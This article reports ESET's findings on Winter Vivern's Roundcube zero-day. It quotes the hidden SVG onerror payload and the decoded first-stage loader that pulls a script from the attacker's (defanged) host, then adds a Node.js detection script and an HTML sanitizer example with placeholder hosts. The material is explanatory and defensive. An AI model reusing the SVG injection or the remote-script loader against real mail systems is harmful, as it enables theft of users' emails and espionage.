New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After learning the technical details about this zero-day, which targeted governmental entities and a think tank in Europe, and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted that the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Technical details about this cyberattack exploiting a zero-day in Roundcube

The threat actor begins the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The purpose of the malicious code is to trigger the onerror attribute by using an invalid URL (x) in the image's href parameter: the browser fails to load the image and runs the handler.

Decoding the payload in the onerror attribute results in a line of JavaScript code that is executed in the victim's browser in the context of the user's Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou's discovery. The researcher was able to establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which did not “… properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user,” as stated by Faou.

The vulnerability does not need any interaction from the user other than viewing the message in a web browser, which perhaps explains why the threat actor did not need to use a very sophisticated social engineering technique; simply viewing the content triggers the exploit.
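As an added triage example (not code from ESET, TechRepublic or Roundcube), the following Node.js script shows how a defender can surface exactly this construction in a mail body: it finds inline event-handler attributes, decodes any base64 passed to atob() and extracts the script URL the loader would fetch. The sample mail and the loader URL in it are constructed for the example; the real command-and-control host is not used.

```javascript
// Added triage example (not ESET's or Roundcube's code): scan an HTML mail body
// for inline event handlers and decode any eval(atob('...')) payload they carry,
// so an analyst can read the loader and list the script URLs it would fetch.
// The mail below is constructed; the loader URL is a placeholder, not the
// campaign's real command-and-control host.

const SAMPLE_LOADER =
  "var fe=document.createElement('script');" +
  "fe.src=\"https://loader.example.invalid/checkupdate.js\";" +
  "document.body.appendChild(fe);";

// Constructed sample: visible lure text followed by the hidden SVG, built the
// same way as the campaign's (base64 payload inside an onerror attribute).
const SAMPLE_MAIL_HTML =
  "<html><body><p>Get started in your Outlook</p>" +
  '<svg id="x" xmlns="http://www.w3.org/2000/svg">' +
  " <image href=\"x\" onerror=\"eval(atob('" +
  Buffer.from(SAMPLE_LOADER, "utf8").toString("base64") +
  "'))\" /></svg></body></html>";

// Any quoted attribute whose name starts with "on" (onerror, onload, ...).
const EVENT_ATTR_RE = /[\s\/]on([a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
// atob('<base64>') or atob("<base64>").
const ATOB_RE = /atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)/g;
// .src = "<url>" assignments inside decoded loader code.
const SRC_RE = /\.src\s*=\s*(['"])([^'"]+)\1/g;

function decodeBase64(b64) {
  return Buffer.from(b64, "base64").toString("utf8");
}

// Returns one finding per event-handler attribute: the event name, the raw
// handler, every decoded atob() payload and every script URL those payloads load.
function findEventHandlers(html) {
  const findings = [];
  for (const m of html.matchAll(EVENT_ATTR_RE)) {
    const handler = m[2] !== undefined ? m[2] : m[3];
    const decoded = [...handler.matchAll(ATOB_RE)].map((a) => decodeBase64(a[2]));
    const scriptUrls = decoded.flatMap((code) =>
      [...code.matchAll(SRC_RE)].map((s) => s[2])
    );
    findings.push({ event: m[1].toLowerCase(), handler, decoded, scriptUrls });
  }
  return findings;
}

// Convenience: the distinct external script URLs a mail body would pull in.
function loaderUrls(html) {
  return [...new Set(findEventHandlers(html).flatMap((f) => f.scriptUrls))];
}

// Print the findings for the constructed sample.
for (const f of findEventHandlers(SAMPLE_MAIL_HTML)) {
  console.log(`on${f.event}: loads ${f.scriptUrls.join(", ") || "(no script URL found)"}`);
}
```

Run it with node; for a real mailbox, feed each message's HTML part to findEventHandlers() and alert on any finding whose scriptUrls point outside the webmail host. The regexes are deliberately simple and only cover quoted attribute values and atob()-wrapped base64; a loader that builds its URL from pieces or uses a different encoding needs the decoded handler read by hand, which is why the raw handler text is kept in each finding.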

After this initial execution of JavaScript code, a second-stage loader, also written in JavaScript and named checkupdate.js, is executed and triggers the final stage, once again written in JavaScript (Figure B).

Figure B

Part of the final JavaScript payload that exfiltrates emails from the victim. Image: ESET

The final payload gives the attacker the capability to list all folders and emails in the current Roundcube email account and to exfiltrate email messages to a command and control server via HTTP requests.

When TechRepublic asked Faou about further compromise of the system, he replied via a written message: “We haven't observed any lateral movement. The JavaScript code is only executed in the context of (the) victim's browser, in the Roundcube window. So it doesn't have access to the backend of Roundcube and escaping the browser would require a much more sophisticated exploit. However, they could re-use their access to launch further phishing campaigns originating from the sender who was compromised (we haven't observed this).”

Who is Winter Vivern?

Winter Vivern, aka TA473, is a cyberespionage threat actor whose interests are closely aligned with the governments of Russia and Belarus. The first public exposure of the Winter Vivern threat actor occurred in 2021, when it targeted several governmental entities in various countries including Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.

This threat actor has a history of exploiting webmail software: it already abused older Roundcube vulnerabilities and known Zimbra webmail vulnerabilities to target elected officials and staffers in the U.S. as well as experts in European politics and economics. The threat actor also targeted mailboxes of NATO-aligned government entities in Europe.

The threat actor often uses malicious documents and sometimes a PowerShell backdoor to compromise its targets. Winter Vivern uses vulnerability scanners such as Acunetix, probably to scan targeted networks.

ESET noted that Winter Vivern has been observed exploiting CVE-2020-35730, a known Roundcube vulnerability, against entities that are also targeted by the threat actor APT28, which has been described as military unit 26165 of Russia's military intelligence agency, previously known as the GRU.

In addition, ESET pointed out a possible link to the threat actor MoustachedBouncer, which runs attacks against foreign diplomats in Belarus. Asked about it, Faou told TechRepublic that “there are quite unique similarities in the network infrastructure of both groups, suggesting that a common entity might provide it to both of them.”

As stated by ESET regarding the current threat, “Despite the low sophistication of the group's toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.”

How to protect users from this cybersecurity threat

ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and released security updates to address the vulnerability on Oct. 16, 2023 for versions 1.6.4, 1.4.15 and 1.5.5. It is strongly advised to patch Roundcube for this vulnerability.

It is recommended to keep all operating systems and software up to date and patched to avoid further compromise that could happen via common vulnerabilities.

Disabling JavaScript execution in the browser would mitigate this threat, but it would greatly degrade the user's experience because many websites rely heavily on JavaScript to function.
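The fix that matters server-side is the one Roundcube shipped in rcube_washtml.php: untrusted HTML must be washed, SVG included, before it is handed to the browser. The block below is an added illustration of that rule in Node.js; it is not Roundcube's code, and the sample SVG and its base64 payload (a harmless placeholder) are constructed. It shows the checks a sanitizer must apply to every tag and a post-wash test confirming the event handler is gone.

```javascript
// Added example (not Roundcube's rcube_washtml.php): the server-side "washing"
// a webmail client must apply to untrusted HTML before it reaches the browser.
// The rule illustrated: inline event-handler attributes (onerror, onload, ...),
// <script> elements and javascript: URLs are removed from every tag, including
// tags inside <svg>, which is where the campaign's payload was hidden.
// A production sanitizer should be a maintained allowlist-based library that
// parses the document properly; regexes over tags are used here for readability
// and can be tripped by unusual attribute values (for example a "/on" inside a URL).

const SCRIPT_BLOCK_RE = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;
// An attribute whose name starts with "on", preceded by whitespace or a "/"
// (so <image/onerror=...> is caught too), with a quoted or bare value.
const EVENT_ATTR_RE = /[\s\/]+on[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi;
// href/src/xlink:href attributes whose value is a javascript: URL.
const JS_URL_ATTR_RE =
  /\s+(?:href|src|xlink:href)\s*=\s*(?:"\s*javascript:[^"]*"|'\s*javascript:[^']*')/gi;

// Strips scripting hooks from an HTML fragment and returns the washed markup.
function washHtml(html) {
  const withoutScripts = html.replace(SCRIPT_BLOCK_RE, "");
  // Rewrite each tag on its own so the attribute regexes never span text nodes.
  return withoutScripts.replace(/<[^>]+>/g, (tag) =>
    tag.replace(EVENT_ATTR_RE, "").replace(JS_URL_ATTR_RE, "")
  );
}

// True when the markup still carries an inline event handler (post-wash check).
function hasEventHandler(html) {
  return /[\s\/]on[a-z]+\s*=/i.test(html);
}

// Constructed sample mirroring the campaign's SVG; the base64 decodes to the
// placeholder "alert(1)", not the real loader.
const SAMPLE_SVG =
  '<svg id="x" xmlns="http://www.w3.org/2000/svg">' +
  ' <image href="x" onerror="eval(atob(\'YWxlcnQoMSk=\'))" /></svg>';

const WASHED_SVG = washHtml(SAMPLE_SVG);

console.log("before:", SAMPLE_SVG);
console.log("after: ", WASHED_SVG);
console.log("handler left after wash:", hasEventHandler(WASHED_SVG));
```

The essential point for the defender is the last line: a sanitizer is only trusted because its output is checked. Roundcube's washtml already stripped event handlers from ordinary HTML; the gap was that SVG content reached the page without the same treatment, so a post-wash assertion of the kind hasEventHandler() performs, run over the whole rendered body rather than only the HTML subset, would have flagged the construction regardless of which element carried it.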

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
